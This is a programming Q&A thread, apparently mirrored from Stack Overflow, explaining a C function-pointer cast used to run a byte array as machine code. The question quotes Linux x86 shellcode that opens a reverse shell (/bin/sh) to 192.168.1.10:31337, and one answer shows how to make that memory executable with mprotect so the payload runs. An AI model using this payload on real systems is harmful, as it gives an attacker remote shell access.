What does int (*ret)() = (int(*)())code mean?

2020-03-04 09:01发布

问题:

Here is a copy of code from shellstorm:

#include <stdio.h>
/*
ipaddr 192.168.1.10 (c0a8010a)
port 31337 (7a69) 
*/
#define IPADDR "\xc0\xa8\x01\x0a"
#define PORT "\x7a\x69"

unsigned char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
"\x01\x6a\x02\x89\xe1\xcd\x80\x89"
"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
IPADDR"\x66\x68"PORT"\x66\x53\xfe"
"\xc3\x89\xe1\x6a\x10\x51\x56\x89"
"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
"\xc0\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
"\x80";

main() 
{
 printf("Shellcode Length: %d\n", sizeof(code)-1);
 int (*ret)() = (int(*)())code;
 ret();
}

Could anyone help me explain this one "int (ret)() = (int()())code;" ? How does it work? Why it can make the code above run?

回答1:

int(*ret)()

declares a function pointer named ret; the function takes unspecified arguments and returns an integer.

(int(*)())code

casts the code array to a function pointer of that same type.

So this converts the address of the code array to a function pointer, which then allows you to call it and execute the code.

Note that this is technically undefined behavior, so it doesn't have to work this way. But this is how practically all implementations compile this code. Shellcodes like this are not expected to be portable -- the bytes in the code array are dependent on the CPU architecture and stack frame layout.



回答2:

You should read a good C programming book.

int (*ret)() declare a pointer to function returning an int -without specifying arguments (in C)

Then = (int(*)())code; is initializing ret with the casted address of code.

At last ret(); is calling that function pointer, hence invoking the machine code in your code array.

BTW, the compiler (and the linker) might put code in a read-only but non-executable segment (this perhaps depends upon how your program was linked). And then your shell code might not work.



回答3:

int (*ret)()

defines the function pointer ret as function returning an int with an unspecified number of arguments.

... = (int(*)())code;

casts the unsigned char-array code to the type of function ret would refer to and assigns it to ret.

This call

ret();

then executes the op-codes stored in code.

All in all not a nice thing.



回答4:

int (*ret)() = (int(*)())code;

int (*ret)() defines a pointer that points to a function which returns int and has unspecified number of arguments; (int(*)())code is a type casting, let the other part could treat code as a function pointer, the same type as ret.

By the way, depends on the contents of code, this code may only works on a specific CPU and OS combination, if it even works and all.



回答5:

int (*)() is the type of a pointer to a function with the following prototype:

int func();

Because of the way the language is parsed and the precedence of the operators, one has to put the asterisk in brackets. Also when declaring a pointer variable of that type, the name of the variable goes after the asterisk and not after the type, e.g. it is not

int (*)() ret;

but rather

int (*ret)();

In your case the ret variable is both being declared and initialised with a type cast involved.

To call a function through a function pointer, you could either use the more elaborate syntax:

(*ret)();

or the more simple one:

ret();

Using the former syntax is preferable since it gives indication to the reader of your code that ret is actually a pointer to a function and not the function itself.

Now, in principle that code should not actually work. The code[] array is placed in the initialised data segment, which in most modern OSes is not executable, i.e. the call ret(); should rather produce a segmentation fault. E.g. GCC on Linux places the code variable in the .data section:

.globl code
    .data
    .align 32
    .type   code, @object
    .size   code, 93
code:
    .string "1\3001\3331...\200"

and then the .data section goes into a non-executable read-write segment:

$ readelf --segments code.exe

Elf file type is EXEC (Executable file)
Entry point 0x4003c0
There are 8 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  PHDR           0x0000000000000040 0x0000000000400040 0x0000000000400040
                 0x00000000000001c0 0x00000000000001c0  R E    8
  INTERP         0x0000000000000200 0x0000000000400200 0x0000000000400200
                 0x000000000000001c 0x000000000000001c  R      1
      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000
                 0x000000000000064c 0x000000000000064c  R E    100000
  vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
  LOAD           0x0000000000000650 0x0000000000500650 0x0000000000500650
                 0x0000000000000270 0x0000000000000278  RW     100000
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  DYNAMIC        0x0000000000000678 0x0000000000500678 0x0000000000500678
                 0x0000000000000190 0x0000000000000190  RW     8
  NOTE           0x000000000000021c 0x000000000040021c 0x000000000040021c
                 0x0000000000000020 0x0000000000000020  R      4
  GNU_EH_FRAME   0x0000000000000594 0x0000000000400594 0x0000000000400594
                 0x0000000000000024 0x0000000000000024  R      4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     8

 Section to Segment mapping:
  Segment Sections...
   00     
   01     .interp
   02     .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version
          .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini
          .rodata .eh_frame_hdr .eh_frame
   03     .ctors .dtors .jcr .dynamic .got .got.plt .data .bss
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
   04     .dynamic
   05     .note.ABI-tag
   06     .eh_frame_hdr
   07     

The segment is missing the executable flag, i.e. it is only RW and not RWE, therefore no code could be executed from that memory. And indeed, running the program results in a fault at the very first instruction stored in code:

(gdb) run
Starting program: /tmp/code.exe 
Shellcode Length: 92

Program received signal SIGSEGV, Segmentation fault.
0x0000000000500860 in code ()
(gdb) up
#1  0x00000000004004a7 in main () at code.c:27
27     ret();
(gdb) print ret
$1 = (int (*)()) 0x500860 <code>

To make it work, you could use a combination of posix_memalign and mprotect to allocate a memory page and make it executable, then copy the content of code[] there:

// For posix_memalign()
#define _XOPEN_SOURCE 600
#include <stdlib.h>
// For memcpy()
#include <string.h>
// For sysconf()
#include <unistd.h>
// For mprotect()
#include <sys/mman.h>

size_t code_size = sizeof(code) - 1;
size_t page_size = sysconf(_SC_PAGESIZE);
int (*ret)();

printf("Shellcode Length: %d\n", code_size);
posix_memalign(&ret, page_size, page_size);
mprotect(ret, page_size, PROT_READ|PROT_WRITE|PROT_EXEC);
memcpy(ret, code, code_size);
(*ret)();

Also note that the shell code uses int 0x80 to call into the Linux kernel. This won't work out-of-the-box if the program is compiled on a 64-bit Linux system as there a different mechanism is used to make system calls. -m32 should be specified in that case to force the compiler generate a 32-bit executable.



回答6:

Your program will produce undefined behaviour. C99 spec, section 6.2.5, paragraph 27 says:

A pointer to void shall have the same representation and alignment requirements as a pointer to a character type. Similarly, pointers to qualified or unqualified versions of compatible types shall have the same representation and alignment requirements. All pointers to structure types shall have the same representation and alignment requirements as each other. All pointers to union types shall have the same representation and alignment requirements as each other. Pointers to other types need not have the same representation or alignment requirements.

Further, in section 6.3.2.3, paragraph 8, it also says:

A pointer to a function of one type may be converted to a pointer to a function of another type and back again; the result shall compare equal to the original pointer.

This means that you should not assign a function pointer to a non-function pointer because the size of a function pointer is not guaranteed to be the same as that of a char pointer or a void pointer. Now these things out of the way, let's come to your code.

int (*ret)() = (int(*)())code;

Let's first take the lhs. So it defines ret to be a pointer to a function which takes a fixed but unknown number and type of arguments (doesn't sound good). On the rhs, you are typecasting an array code, which evaluates to a pointer to its first element to the same type as ret. This is undefined behaviour. Only a function pointer can be assigned to a function pointer, not a pointer to any other type for reasons explained above. Also, sizeof operator may not be applied to a function pointer precisely because of this reason.

In C++, empty parameter list means void, but that's not the case in C where it means no information is available to check against argument list provided by the caller. Hence you must explicitly mention void. So you should better write that statement as, assuming now that you have a function named code defined in your program.

int code(void); 
int (*ret)(void) = (int(*)(void))code;

To simplify things about complex C declarations, typedef might help.

typedef int (*myfuncptr)(void); 

This defines a type myfuncptr to be of type pointer to a function taking no arguments and returning an int. Next, we can define a variable of myfuncptr type like we define a variable of any type in C. However please note that code must have the same signature as the type of the function ret points to. If you cast a function pointer of any other type using myfuncptr, it will cause undefined behaviour. Therefore, this makes typecasting redundant.

int code(void);
int foo(int);

myfuncptr ret = code; // typecasting not needed. Same as- myfuncptr ret = &code;
myfuncptr bar = (myfuncptr)foo;  // undefined behaviour.

A function name evaluates to a pointer when you assign it to, well, a function pointer of the same type. You don't need to use the address of operator &. Similarly, you can call the function pointed to by the pointer without dereferencing it first.

ret();     // call the function pointed to by ret
(*ret)()   // deferencing ret first.

Please read this for details - Casting a function pointer to another type. Here's a good resource on how to mentally parse complex C declaration - Clockwise/Spiral Rule. Also note that the C standard lays down only two acceptable signature of main:

int main(void);
int main(int argc, char *argv[]);